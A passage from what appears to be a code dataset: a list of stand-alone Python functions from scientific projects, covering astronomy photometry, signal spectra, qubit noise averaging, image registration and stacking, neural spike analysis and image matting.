get_data(\"simwmdisc\", target_extension='.h5' ) )\n qq = rnmdl.predict( myfeatures )\n\n lesresamb = ants.threshold_image( lesresam, wmh_thresh, 1.0 )\n lgo=ants.label_geometry_measures( lesresamb, lesresam )\n wmhsummary = pd.read_csv( get_data(\"wmh_evidence\", target_extension='.csv' ) )\n wmhsummary.at[0,'Value']=lgo.at[0,'VolumeInMillimeters']\n wmhsummary.at[1,'Value']=lgo.at[0,'IntegratedIntensity']\n wmhsummary.at[2,'Value']=float(qq)\n\n return {\n \"wmh_summary\":wmhsummary,\n \"wmh_probability_image\":lesresam,\n \"wmh_evidence_of_existence\":float(qq),\n \"wmh_max_prob\":lesresam.max(),\n \"features\":myfeatures }", "def find_peaks(f_arr, sigma, niter, bsigma=None):\n # set up the variables\n if bsigma is None:\n bsigma = sigma\n\n # determine the background statistics\n back_ave, back_std = find_backstats(f_arr, sigma, niter)\n\n # calculate the differences between the pixels\n dfh = f_arr[1:-1] - f_arr[:-2]\n dfl = f_arr[1:-1] - f_arr[2:]\n\n # find the objects\n mask = (dfh > 0) * (dfl > 0) * \\\n (abs(f_arr[1:-1] - back_ave) > back_std * sigma)\n t = np.where(mask)[0]\n return t + 1", "def calculate_psf_tilts():\n for order in [1, 2]:\n\n # Get the file\n path = 'files/SOSS_PSF_tilt_order{}.npy'.format(order)\n psf_file = resource_filename('awesimsoss', path)\n\n # Dimensions\n subarray = 'SUBSTRIP256'\n X = range(2048)\n Y = range(256)\n\n # Get the wave map\n wave_map = utils.wave_solutions(subarray, order).astype(float)\n\n # Get the y-coordinate of the trace polynomial in this column\n # (center of the trace)\n coeffs = trace_polynomials(subarray=subarray, order=order)\n trace = np.polyval(coeffs, X)\n\n # Interpolate to get the wavelength value at the center\n wave = interp2d(X, Y, wave_map)\n\n # Get the wavelength of the trace center in each column\n trace_wave = []\n for x, y in zip(X, trace):\n trace_wave.append(wave(x, y)[0])\n\n # For each column wavelength (defined by the wavelength at\n # the trace center) define an isowavelength contour\n angles = []\n for n, x in enumerate(X):\n\n w = trace_wave[x]\n\n # Edge cases\n try:\n w0 = trace_wave[x-1]\n except IndexError:\n w0 = 0\n\n try:\n w1 = trace_wave[x+1]\n except IndexError:\n w1 = 10\n\n # Define the width of the wavelength bin as half-way\n # between neighboring points\n dw0 = np.mean([w0, w])\n dw1 = np.mean([w1, w])\n\n # Get the coordinates of all the pixels in that range\n yy, xx = np.where(np.logical_and(wave_map >= dw0, wave_map < dw1))\n\n # Find the angle between the vertical and the tilted wavelength bin\n if len(xx) >= 1:\n angle = get_angle([xx[-1], yy[-1]], [x, trace[x]])\n else:\n angle = 0\n\n # Don't flip them upside down\n angle = angle % 180\n\n # Add to the array\n angles.append(angle)\n\n # Save the file\n np.save(psf_file, np.array(angles))\n print('Angles saved to', psf_file)", "def haperfluxMany(inputlist, maplist, radius, rinner, router, galactic=True, decimal=True, noise_model=0):\n\n ## Names and frequencies of the sample maps included in this repo.\n\n freqlist = ['30','44','70','100','143','217','353','545','857','1249','1874','2141','2998','3331','4612','4997','11992','16655','24983','24983','24983','33310']\n freqval = [28.405889, 44.072241,70.421396,100.,143.,217.,353.,545.,857.,1249.,1874.,2141.,2141.,2998.,2998.,3331.,4612.,4997.,11992.,16655.,24983.,24983.,24983.,33310.]\n band_names = [\"akari9\", \"dirbe12\",\"iras12\",\"wise12\",\"akari18\",\"iras25\",\"iras60\",\"akari65\",\"akari90\",\"dirbe100\",\"iras100\",\"akari140\",\"dirbe140\",\"akari160\",\"dirbe240\",\"planck857\", \"planck545\"]\n\n k0 = 1.0\n k1 = rinner/radius\n k2 = router/radius\n apcor = ((1 - (0.5)**(4*k0**2))-((0.5)**(4*k1**2) - (0.5)**(4*k2**2)))**(-1)\n\n # 'galactic' overrules 'decimal'\n if (galactic==True):\n dt=[('sname',np.dtype('S13')),('glon',np.float32),('glat',np.float32)]\n targets = np.genfromtxt(inputlist, delimiter=\",\",dtype=dt)\n\n ns = len(targets['glat'])\n\n fd3 = -1\n fd_err3 = -1\n\n fn = np.genfromtxt(maplist, delimiter=\" \", dtype='str')\n nmaps = len(fn)\n ## Initialize the arrays which will hold the results\n fd_all = np.zeros((ns,nmaps))\n fd_err_all = np.zeros((ns,nmaps))\n fd_bg_all = np.zeros((ns,nmaps))\n\n # Start the actual processing: Read-in the maps.\n for ct2 in range(0,nmaps):\n xtmp_data, xtmp_head = hp.read_map(fn[ct2], h=True, verbose=False, nest=False)\n freq = dict(xtmp_head)['FREQ']\n units = dict(xtmp_head)['TUNIT1']\n freq_str = str(freq)\n idx = freqlist.index(str(freq))\n currfreq = int(freq)\n\n if (radius == None):\n radval = fwhmlist[idx]\n else:\n radval = radius\n\n\n for ct in range(0,ns):\n\n glon = targets['glon'][ct]\n glat = targets['glat'][ct]\n\n fd_all[ct,ct2], fd_err_all[ct,ct2], fd_bg_all[ct,ct2] = \\\n haperflux(inmap= xtmp_data, freq= currfreq, lon=glon, lat=glat, aper_inner_radius=radius, aper_outer_radius1=rinner, \\\n aper_outer_radius2=router,units=units, noise_model=noise_model)\n\n if (np.isfinite(fd_err_all[ct,ct2]) == False):\n fd_all[ct,ct2] = -1\n fd_err_all[ct,ct2] = -1\n else:\n if radius==None:\n fd_all[ct,ct2] = fd_all[ct,ct2]*apcor\n fd_err_all[ct,ct2] = fd_err_all[ct,ct2]*apcor\n\n return fd_all, fd_err_all, fd_bg_all", "def tapered_spectra(s, tapers, NFFT=None, low_bias=True):\r\n N = s.shape[-1]\r\n # XXX: don't allow NFFT < N -- not every implementation is so restrictive!\r\n if NFFT is None or NFFT < N:\r\n NFFT = N\r\n rest_of_dims = s.shape[:-1]\r\n M = int(np.product(rest_of_dims))\r\n\r\n s = s.reshape(int(np.product(rest_of_dims)), N)\r\n # de-mean this sucker\r\n s = utils.remove_bias(s, axis=-1)\r\n\r\n if not isinstance(tapers, np.ndarray):\r\n # then tapers is (NW, K)\r\n args = (N,) + tuple(tapers)\r\n dpss, eigvals = dpss_windows(*args)\r\n if low_bias:\r\n keepers = (eigvals > 0.9)\r\n dpss = dpss[keepers]\r\n eigvals = eigvals[keepers]\r\n tapers = dpss\r\n else:\r\n eigvals = None\r\n K = tapers.shape[0]\r\n sig_sl = [slice(None)] * len(s.shape)\r\n sig_sl.insert(len(s.shape) - 1, np.newaxis)\r\n\r\n # tapered.shape is (M, Kmax, N)\r\n tapered = s[sig_sl] * tapers\r\n\r\n # compute the y_{i,k}(f) -- full FFT takes ~1.5x longer, but unpacking\r\n # results of real-valued FFT eats up memory\r\n t_spectra = fftpack.fft(tapered, n=NFFT, axis=-1)\r\n t_spectra.shape = rest_of_dims + (K, NFFT)\r\n if eigvals is None:\r\n return t_spectra\r\n return t_spectra, eigvals", "def process_noise(qubit, tstep, noise_samples, sigma_array):\n from scipy.stats import norm\n noise_weights = np.zeros((len(sigma_array), len(noise_samples)))\n average_chi_array = np.zeros((len(sigma_array), 9,9), dtype=complex)\n raw_chi_array = noise_iteration(qubit, tstep, noise_samples)\n for i in range(len(sigma_array)):\n noise_weights[i, :] += norm.pdf(noise_samples, loc=0.0, scale=sigma_array[i])\n average_chi_array[i, :, :] += noise_averaging(noise_samples, noise_weights[i, :], raw_chi_array)\n return average_chi_array, raw_chi_array", "def wrapper_fit_func(x, ntraps, *args):\n a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])\n offset = args[0][-1]\n return gaussianarray1d(x, a, b, c, offset, ntraps)", "def addNoise_amp(array,counts):\r\n if array.dtype == 'complex' :\r\n arrayout = addNoise(np.real(array),counts) + 1.0J * addNoise(np.imag(array),counts)\r\n else :\r\n if np.float64(counts) == 0.0e0 :\r\n arrayout = np.copy(array)\r\n elif np.float64(counts) < 0.0e0 :\r\n print 'bg.addNoise : warning counts < 0'\r\n else :\r\n arrayout = np.zeros(array.shape)\r\n arrayout = np.square(normalise(array))\r\n arrayout = np.random.poisson(arrayout*np.float64(counts))/np.float64(counts)\r\n arrayout = np.sqrt(arrayout)\r\n tot = np.sum(np.abs(array)**2)\r\n arrayout = normalise(arrayout,tot)\r\n return arrayout", "def single_channel_stacking(tifs):\n template_ID=int(len(tifs)/2)\n \n template_raster=gdal_array.LoadFile(tifs[template_ID-1])\n avg_raster=np.zeros_like(template_raster)\n avg_raster=avg_raster+1\n new_raster=np.copy(template_raster)\n # ones=np.full(template_raster.shape, 1)\n for i, tif in enumerate(tifs, start=1):\n if i==template_ID: \n continue\n \n tif_raster=gdal_array.LoadFile(tif)\n # tif_raster=cut_transformed_array_borders(tif_raster)\n result=ird.similarity(template_raster,tif_raster , numiter=1, order=1)\n img_transformed= ird.transform_img(tif_raster, scale=result['scale'], angle=result['angle'], tvec=result['tvec'], mode='constant', bgval=0, order=2)\n \n img_transformed=cut_transformed_array_borders(img_transformed)\n \n # ones_transformed=ird.transform_img(ones, scale=result['scale'], angle=result['angle'], tvec=result['tvec'], mode='constant', bgval=0, order=1)\n ones_transformed=np.zeros_like(template_raster)\n ones_transformed[np.where(img_transformed>0)]=1\n print(ones_transformed)\n \n print(np.mean(ones_transformed), np.max(ones_transformed), np.min(ones_transformed))\n print(ones_transformed[np.where(ones_transformed>0)])\n print(np.min(ones_transformed[np.where(ones_transformed>0)]))\n print(np.max(ones_transformed[np.where(ones_transformed>0)]))\n\n plt.imshow(ones_transformed)\n plt.show()\n plt.close()\n \n # ones_transformed=cut_transformed_array_borders(ones_transformed)\n \n avg_raster=avg_raster+ones_transformed\n # ird.imshow(template_raster, tif_raster, img_transformed)\n \n new_raster=new_raster+img_transformed\n \n # new_raster=new_raster+template_raster \n # new_raster=new_raster/len(tifs)\n\n gtz=np.where(avg_raster>0)\n \n\n \n\n \n \n plt.imshow(new_raster)\n plt.show()\n plt.close()\n # gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_not_abvertaghe_stacked_.tiff\")\n new_raster[gtz]=new_raster[gtz]/avg_raster[gtz] \n gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_stacked_.tiff\")\n plt.imshow(new_raster)\n plt.savefig(\"test.tif\", dpi=800)\n plt.show()\n plt.close()\n\n def discrete_cmap(N, base_cmap=None):\n \"\"\"Create an N-bin discrete colormap from the specified input map\"\"\"\n \n # Note that if base_cmap is a string or None, you can simply do\n # return plt.cm.get_cmap(base_cmap, N)\n # The following works for string, None, or a colormap instance:\n \n base = plt.cm.get_cmap(base_cmap)\n color_list = base(np.linspace(0, 1, N))\n cmap_name = base.name + str(N)\n return base.from_list(cmap_name, color_list, N)\n\n cmap=discrete_cmap(int(avg_raster.max())+1, base_cmap=\"ocean\") \n \n norm=mpl.colors.BoundaryNorm(np.arange(-0.5,int(avg_raster.max()+1)), cmap.N)\n fig=plt.figure()\n fig.set_size_inches(5,4)\n ax=fig.add_subplot(111)\n data=ax.matshow(avg_raster, cmap=cmap, norm=norm)\n fig.colorbar(data, ticks=np.linspace(0,int(avg_raster.max()),int(avg_raster.max()+1)), drawedges=True)\n\n plt.show()\n plt.close()\n\n\n # gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_stacked_.tiff\")", "def pick_triplets_images(images, n_triplets):\n\n indices = _pick_triplets(len(images), n_triplets)\n\n n_samples = len(indices)\n\n n_rows, n_cols, n_channels = images[0].shape\n\n images_samples = np.zeros((n_samples,n_rows, n_cols, n_channels), dtype = np.uint8)\n\n for i, index in enumerate(indices):\n images_samples[i] = images[index]\n\n return images_samples", "def extract_features_2d(\n dim,\n img,\n n_sigmas,\n intensity=True,\n edges=True,\n texture=True,\n sigma_min=0.5,\n sigma_max=16\n):\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features from channel %i' % (dim))\n\n # computations are faster as float32\n img = img_as_float32(img)\n\n sigmas = np.logspace(\n np.log2(sigma_min),\n np.log2(sigma_max),\n num=n_sigmas, #int(np.log2(sigma_max) - np.log2(sigma_min) + 1),\n base=2,\n endpoint=True,\n )\n\n if (psutil.virtual_memory()[0]>10000000000) & (psutil.virtual_memory()[2]<50): #>10GB and <50% utilization\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features in parallel')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n all_results = Parallel(n_jobs=-2, verbose=0)(delayed(features_sigma)(img, sigma, intensity=intensity, edges=edges, texture=texture) for sigma in sigmas)\n else:\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features in series')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n n_sigmas = len(sigmas)\n all_results = [\n features_sigma(img, sigma, intensity=intensity, edges=edges, texture=texture)\n for sigma in sigmas\n ]\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Features from channel %i for all scales' % (dim))\n\n return list(itertools.chain.from_iterable(all_results))", "def update_for_in_trap(self, t, traps): #******\n sources = traps.param['source_locations'] #Of format [(0,0),]\n for trap_num, trap_loc in enumerate(sources):\n dist_vals = distance((self.x_position, self.y_position),trap_loc)\n mask_trapped = dist_vals < traps.param['trap_radius']\n self.mode[mask_trapped] = self.Mode_Trapped\n self.trap_num[mask_trapped] = trap_num\n self.x_trap_loc[mask_trapped] = trap_loc[0]\n self.y_trap_loc[mask_trapped] = trap_loc[1]\n self.x_velocity[mask_trapped] = 0.0\n self.y_velocity[mask_trapped] = 0.0\n\n # Get time stamp for newly trapped flies\n mask_newly_trapped = mask_trapped & (self.t_in_trap == scipy.inf)\n self.t_in_trap[mask_newly_trapped] = t", "def extract_templates(im, interactive = False):\n\n im = np.flipud(im)\n# tmp = cv2.medianBlur(im, 5)\n# tmp = cv2.threshold(tmp, 255*0.65, 255, cv2.THRESH_BINARY)[1]\n\n im_filtered = filter_specgram(im, interactive)\n _, contours, _ = cv2.findContours(\n im_filtered,\n cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE\n )\n\n templates = []\n\n im_dbg_template_rejected = None\n im_dbg_template_overlay = None\n if interactive:\n im_dbg_template_rejected = im.copy()\n im_dbg_template_overlay = im.copy()\n\n #im_dbg_template_overlay *= 255/im_dbg_template_overlay.max()\n\n\n # apply trunc threshold\n # apply gaussian blur\n # apply binary threshold\n # remove small blobs\n # remove huge blobs\n # for each blob, check surrounding blobs within given radius and add \n # (how to choose which to add? what radius?\n smallest = -1\n average_val = np.average(im)\n print 'average: {}'.format(average_val)\n\n for i in xrange(len(contours)):\n r = cv2.boundingRect(contours[i])\n\n left = max(0, r[0] - 10)\n top = max(0, r[1] - 10)\n right = min(len(im[0]), r[0] + r[2] + 10)\n bottom = min(len(im), r[1] + r[3] + 10)\n\n area = r[2] * r[3]\n\n #TODO: use average values from sgram?\n if area < 50 or area > 10000: # : continue\n #if area > 10000:\n if not interactive: continue\n# cv2.putText(im_dbg_template_rejected, '{}'.format(area),\n# (left, top), cv2.FONT_HERSHEY_PLAIN, 1.0,\n# int(np.max(im_dbg_template_rejected)))\n cv2.rectangle(im_dbg_template_rejected, (left,top), (right,bottom), int(np.max(im_dbg_template_rejected)), 1)\n continue\n\n if smallest == -1 or area < smallest: smallest = area\n\n x = im[top:bottom, left:right]\n #x = im[r[1]:r[1]+r[3], r[0]:r[0]+r[2]]\n if np.min(x) >= average_val:\n if not interactive: continue\n cv2.putText(im_dbg_template_rejected, 'v:{}'.format(np.average(x)), (left, top), cv2.FONT_HERSHEY_PLAIN, 1.0, int(np.max(im_dbg_template_rejected)))\n cv2.rectangle(im_dbg_template_rejected, (left,top), (right,bottom), int(np.max(im_dbg_template_rejected)), 1)\n continue\n x = cv2.GaussianBlur(x, (0,0), 1.5)\n templates.append(x)\n\n if interactive:\n cv2.rectangle(im_dbg_template_overlay, (left, top), (right, bottom), int(np.max(im_dbg_template_overlay)), 1)\n #cv2.rectangle(im_dbg_template_overlay, (r[0]-10, r[1]-10), (r[0]+r[2]+10, r[1]+r[3]+10), (255,0,0), 1)\n if interactive:\n plotMultiple([im_dbg_template_overlay, im_dbg_template_rejected],\n #plotMultiple([im_filtered, im_dbg_template_rejected],\n None,\n ['templates', 'rejected'])\n\n\n# cv2.namedWindow('orig')\n# cv2.imshow('orig', im_dbg_template_overlay)\n# cv2.namedWindow('rejected')\n# cv2.imshow('rejected', im_dbg_template_rejected)\n # plt.imshow(im_dbg_template_overlay, aspect='auto')\n # plt.show()\n print 'smallest: {}'.format(smallest)\n plt_(im_dbg_template_rejected,'reject')\n plt_(im_dbg_template_overlay,'accept')\n# while cv2.waitKey(0) != ord('n'):\n# pass\n\n return templates", "def dump_psth_peaks(ffname, outprefix, celltype, window=100e-3, binwidth=5e-3):\n with open('{}_psth_{}_{}ms_window_{}ms_bins.csv'.format(outprefix, celltype, window*1e3, binwidth*1e3), 'wb') as fd:\n writer = csv.writer(fd, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n dbcnt_flist = get_dbcnt_dict(ffname)\n bins = np.arange(-window / 2.0, window / 2.0 + 0.5 * binwidth, binwidth)\n writer.writerow(['dbcount', 'filename'] + list(np.asarray(np.round(bins[1:]*1e3), dtype=int)))\n for dbcnt, flist in dbcnt_flist.items():\n for fname in flist:\n data = TraubData(makepath(fname))\n pop_train_list = []\n bgtimes, probetimes = get_stim_times(data, correct_tcr=True)\n if (len(bgtimes) == 0) and (len(probetimes) == 0):\n print 'EE: {} has no TCR spiking on stimulus.'.format(fname)\n continue\n stim_times = np.concatenate((bgtimes, probetimes))\n stim_times.sort()\n # print '###', stim_times\n for cell, train in data.spikes.items():\n if cell.startswith(celltype):\n pop_train_list.append(train)\n pop_train = np.concatenate(pop_train_list)\n pop_train.sort()\n \n bgpsth, b = psth(pop_train, stim_times, window=window, bins=bins)\n bgpsth /= (data.cellcounts._asdict()[celltype] * binwidth)\n writer.writerow([dbcnt, fname] + list(bgpsth))", "def peaks_mc(t, y, e, thresh=0, N_trials=5000, N_peaks=None, **pgram_kwargs):\n tstart = timeit.default_timer()\n\n def do_trial(**kwargs):\n y_jig = np.random.normal(y, e)\n periods, power = lombscargle(t, y_jig, **kwargs)\n peaks = peak_indices(power, thresh=thresh)\n pk_periods = periods[peaks]\n pk_power = power[peaks]\n if N_peaks is not None and pk_periods.size >= N_peaks:\n pk_periods = pk_periods[0:N_peaks]\n pk_power = power[0:N_peaks]\n return periods, pk_periods, pk_power\n \n # Do one trial to get the periods\n periods, mc_pk_periods, mc_pk_power = do_trial(**pgram_kwargs)\n \n # Now do the rest\n for i in range(N_trials - 1):\n periods, pk_periods, pk_power = do_trial(periods=periods)\n mc_pk_periods = np.append(mc_pk_periods, pk_periods)\n mc_pk_power = np.append(mc_pk_power, pk_power)\n tend = timeit.default_timer()\n print(\"trials=%i peaks=%i thresh=%0.3g\" % (N_trials, mc_pk_periods.size, thresh))\n print(\"%i trials of %i samples to %i periods in %f s\" % \\\n (N_trials, y.size, periods.size, tend - tstart))\n return mc_pk_periods, mc_pk_power", "def tqumap_homog_noise( pix, nlev_t, nlev_p):\n nx, dx, ny, dy = pix.nx, pix.dx, pix.ny, pix.dy\n \n ret = maps.tqumap( nx, dx, ny=ny, dy=dy )\n ret.tmap += np.random.standard_normal(ret.tmap.shape) * nlev_t / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n ret.qmap += np.random.standard_normal(ret.qmap.shape) * nlev_p / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n ret.umap += np.random.standard_normal(ret.umap.shape) * nlev_p / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n return ret", "def test_gaussian():\n generator = SignalGenerator()\n data = generator.random_gaussian(means=[1, 0, -1], stds=[0.1, 0.1, 0.1])\n freq_features = FrequencyFeature(data, sr=50)\n freq_features.fft().peaks()\n top_n = range(1, 11)\n top_n_dominant_frequencies = np.concatenate(\n list(map(freq_features.dominant_frequency_power, top_n)), axis=0)\n std_top_n_dfs = np.std(top_n_dominant_frequencies, axis=0)\n assert np.all(std_top_n_dfs < 0.001)", "def countmap(band,skypos,tranges,skyrange,width=False,height=False,\n\t\t\t verbose=0,tscale=1000.,memlight=False,hdu=False,retries=20):\n\timsz = gxt.deg2pix(skypos,skyrange)\n\tcount = np.zeros(imsz)\n\tfor trange in tranges:\n\t\t# If memlight is requested, break the integration into\n\t\t# smaller chunks.\n\t\tstep = memlight if memlight else trange[1]-trange[0]\n\t\tfor i in np.arange(trange[0],trange[1],step):\n\t\t\tt0,t1=i,i+step\n\t\t\tif verbose:\n\t\t\t\tprint_inline('Coadding '+str(t0)+' to '+str(t1))\n\t\t\tevents = gQuery.getArray(gQuery.rect(band,skypos[0],skypos[1],t0,t1,\n\t\t\t\t\t\t\t\t\t\t\t\t skyrange[0],skyrange[1]),\n\t\t\t\t\t\t\t\t\t verbose=verbose,retries=retries)\n\n\t\t\t# Check that there is actually data here.\n\t\t\tif not events:\n\t\t\t\tif verbose>1:\n\t\t\t\t\tprint \"No data in \"+str([t0,t1])\n\t\t\t\tcontinue\n\n\t\t\ttimes = np.array(events,dtype='float64')[:,0 ]/tscale\n\t\t\tcoo =\tnp.array(events,dtype='float64')[:,1:]\n\n\t\t\t# If there's no data, return a blank image.\n\t\t\tif len(coo)==0:\n\t\t\t\tif verbose:\n\t\t\t\t\tprint 'No data in this frame: '+str([t0,t1])\n\t\t\t\tcontinue\n\n\t\t\t# Define World Coordinate System (WCS)\n\t\t\twcs = define_wcs(skypos,skyrange,width=False,height=False)\n\n\t\t\t# Map the sky coordinates onto the focal plane\n\t\t\tfoc = wcs.sip_pix2foc(wcs.wcs_world2pix(coo,1),1)\n\n\t\t\t# Bin the events into actual image pixels\n\t\t\tH,xedges,yedges=np.histogram2d(foc[:,1]-0.5,foc[:,0]-0.5,\n\t\t\t\t\t\t\t\tbins=imsz,range=([ [0,imsz[0]],[0,imsz[1]] ]))\n\t\t\tcount += H\n\n\treturn count", "def airgaps_from_sequence(self, seq_model, tfrms):\n for e in self.elements:\n if isinstance(e, AirGap):\n return # found an AirGap, model probably OK\n\n num_elements = 0\n seq_model = self.opt_model.seq_model\n for i, g in enumerate(seq_model.gaps):\n if g.medium.name().lower() == 'air':\n if i > 0:\n s = seq_model.ifcs[i]\n tfrm = tfrms[i]\n self.process_airgap(seq_model, i, g, s, tfrm,\n num_elements, add_ele=False)", "def find_peaks_(image):\n\n height, width = image.shape[:2]\n img_matrix = [sum(i)/len(i) for i in image]\n x=[i for i in range(height)]\n y = [255-i for i in img_matrix]\n y = gaussian_filter(y, sigma=20)\n maxs, _ = find_peaks(y)\n maxs = maxs.tolist()\n\n return maxs", "def make_td_images(td, num_spikes, step_factor=1):\n assert isinstance(td, ev.Events)\n assert isinstance(num_spikes, int)\n assert num_spikes > 0\n assert step_factor > 0\n\n # with timer.Timer() as my_timer:\n event_offset = 0\n images = []\n while event_offset + num_spikes < td.data.size:\n image = np.zeros((td.height, td.width), dtype=np.uint8)\n unique_spike_count = 0\n index_ptr = event_offset\n while (unique_spike_count < num_spikes) & (index_ptr < td.data.size):\n event = td.data[index_ptr]\n y = event.y\n x = event.x\n if image[y, x] == 0:\n image[y, x] = 255\n unique_spike_count += 1\n\n index_ptr += 1\n\n # cv2.imshow('img', img)\n # cv2.waitKey(1)\n if unique_spike_count < num_spikes:\n break\n\n images.append(image)\n\n # offset next image\n total_spikes_traversed = index_ptr - event_offset\n event_offset += math.floor(total_spikes_traversed * step_factor) + 1\n # print 'Making images out of bin file took %s seconds' % my_timer.secs\n\n return images", "def transform(self, imgList):\n res = []\n for img in tqdm(imgList):\n y_mean = np.mean(img, axis=1)\n self.get_filtration(y_mean)\n seg = self.get_segments()\n seg = sorted(seg, key=lambda x:x[0])\n res.append(seg)\n return res", "def getstats(img, thresholds):\n number = np.zeros(img.shape, np.float64)\n ev = np.zeros(img.shape, np.float64)\n scatter = np.zeros(img.shape, np.float64)\n for n, s, low, high, evs in thresholds:\n for i in numba.prange(img.shape[0]):\n for j in numba.prange(img.shape[1]):\n if (low < img[i, j]) and (img[i, j] < high):\n scatter[i, j] = s\n number[i, j] = n\n ev[i, j] = img[i, j] - evs\n return ev, number, scatter", "def multi_sigma_noise_sampling(qubit, tstep, sigma_array, num_samples):\n\n noise_samples0 = np.linspace(-5*sigma_array[-1], 5*sigma_array[-1], num_samples)\n average_chi_array0, raw_chi_array0 = process_noise(qubit, tstep, noise_samples0, sigma_array)\n \n converge_value = 1.0\n num_runs = 1\n # Used to progressively refine the sampling space\n sig_index = -1\n\n while converge_value > 1e-7:\n if num_runs % 3 == 0:\n noise_samples1 = wing_doubling(noise_samples0, sigma_array[sig_index])\n else:\n noise_samples1 = two_sigma_doubling(noise_samples0, sigma_array[sig_index])\n average_chi_array1, raw_chi_array1 = process_noise(qubit, tstep, noise_samples1, sigma_array)\n\n converge_array = np.zeros((len(sigma_array)))\n\n diff_matrix = average_chi_array1 - average_chi_array0\n converge_array = np.real(np.sqrt(\n np.einsum('ijj',\n np.einsum('ijk,ikm->ijm', diff_matrix, \n np.einsum('ikj', diff_matrix.conj())))))\n \n # Ensure that all of the individual chi-matrices have converged\n converge_value = np.max(converge_array)\n for i, norm in reversed(list(enumerate(converge_array))):\n if norm < 1e-8:\n sig_index = i\n break\n\n noise_samples0 = noise_samples1\n average_chi_array0 = average_chi_array1\n raw_chi_array0 = raw_chi_array1\n print(converge_array)\n print(num_runs)\n num_runs += 1\n return len(noise_samples1), average_chi_array1", "def get_spike_times_ps(nn, n_ps=1, frac=1.):\n sp = []\n n = 0\n for gr in nn.p_ass_index[n_ps]:\n for nrn in gr[0:frac * len(gr)]:\n for t in nn.mon_spike_e[nrn]:\n sp.append((n, t))\n n += 1\n\n return sp", "def findRMpeaks(self, pix, threshold):\n\t\tsigma = np.std(self.getz(pix))\n\t\tdetections = []\n\t\tfor i, phi in enumerate(self.getz(pix)):\n \t\t \tif phi > threshold*sigma: detections.append(i)\n \t \treturn detections", "def get_amplitude_map(self, timeWindow=(0, 0.5)):\n\n windowIndex = np.logical_and(self.time>=timeWindow[0], self.time<=timeWindow[1])\n\n indON,indOFF,allAltPos,allAziPos = self._sort_index()\n\n ampON = np.zeros(indON.shape); ampON[:]=np.nan; ampOFF = ampON.copy()\n\n for i in np.ndindex(indON.shape):\n traceIndON = indON[i]; traceIndOFF = indOFF[i]\n if traceIndON is not None: ampON[i] = np.mean(np.mean(self.data[traceIndON]['traces'],axis=0)[windowIndex])\n if traceIndOFF is not None: ampOFF[i] = np.mean(np.mean(self.data[traceIndOFF]['traces'],axis=0)[windowIndex])\n\n return ampON, ampOFF, allAltPos, allAziPos", "def averageTrialsByTriggers(trigger_indices, np_data):\n trialLen = trigger_indices[1] -trigger_indices[0] -1\n data_avg = [] \n data_std = [] \n\n for i in trigger_indices:\n data_avg.append(numpy.average(np_data[i+1:i+trialLen-1])) \n data_std.append(numpy.std(np_data[i+1:i+trialLen-1])) \n \n return (data_avg, data_std)", "def bayes_matting(img, trimap, sigma_d=10, it=1):\n assert img.shape[:-1] == trimap.shape\n\n img = img / 255.0\n nrows, ncols = img.shape[:-1]\n\n # initial alpha guess\n alpha = np.zeros(trimap.shape)\n alpha[trimap == 255] = 1\n alpha[trimap == 128] = 0.5\n\n B = img[alpha == 0] # background pixel mask\n F = img[alpha == 1] # foreground pixel mask\n\n mean_B = np.mean(B, axis=0)\n cov_B = np.cov(B.T)\n mean_F = np.mean(F, axis=0)\n cov_F = np.cov(F.T)\n\n try:\n inv_cov_B = np.linalg.inv(cov_B)\n inv_cov_F = np.linalg.inv(cov_F)\n except LinAlgError:\n print(\"LinAlgError\")\n\n for i in range(it):\n print(\"Iteration {}\".format(i))\n for row in range(nrows):\n for col in range(ncols):\n if trimap[row, col] == 128:\n f, g = calculate_fg(img[row, col], alpha[row, col], mean_F, inv_cov_F, mean_B, inv_cov_B, sigma_d)\n alpha[row, col] = calculate_alpha(img[row, col], f, g)\n\n alpha = np.clip(alpha, 0, 1)\n\n return alpha", "def proc_modscag(fn_list, extent=None, t_srs=None):\n #Use cubic spline here for improve upsampling \n ds_list = warplib.memwarp_multi_fn(fn_list, res='min', extent=extent, t_srs=t_srs, r='cubicspline')\n stack_fn = os.path.splitext(fn_list[0])[0] + '_' + os.path.splitext(os.path.split(fn_list[-1])[1])[0] + '_stack_%i' % len(fn_list) \n #Create stack here - no need for most of mastack machinery, just make 3D array\n #Mask values greater than 100% (clouds, bad pixels, etc)\n ma_stack = np.ma.array([np.ma.masked_greater(iolib.ds_getma(ds), 100) for ds in np.array(ds_list)], dtype=np.uint8)\n\n stack_count = np.ma.masked_equal(ma_stack.count(axis=0), 0).astype(np.uint8)\n stack_count.set_fill_value(0)\n stack_min = ma_stack.min(axis=0).astype(np.uint8)\n stack_min.set_fill_value(0)\n stack_max = ma_stack.max(axis=0).astype(np.uint8)\n stack_max.set_fill_value(0)\n stack_med = np.ma.median(ma_stack, axis=0).astype(np.uint8)\n stack_med.set_fill_value(0)\n\n out_fn = stack_fn + '_count.tif'\n iolib.writeGTiff(stack_count, out_fn, ds_list[0])\n out_fn = stack_fn + '_max.tif'\n iolib.writeGTiff(stack_max, out_fn, ds_list[0])\n out_fn = stack_fn + '_min.tif'\n iolib.writeGTiff(stack_min, out_fn, ds_list[0])\n out_fn = stack_fn + '_med.tif'\n iolib.writeGTiff(stack_med, out_fn, ds_list[0])\n\n ds = gdal.Open(out_fn)\n return ds", "def all_feature_extractor(imgpath):\r\n\r\n image = cv2.imread(imgpath)\r\n image = cv2.cvtColor(image, 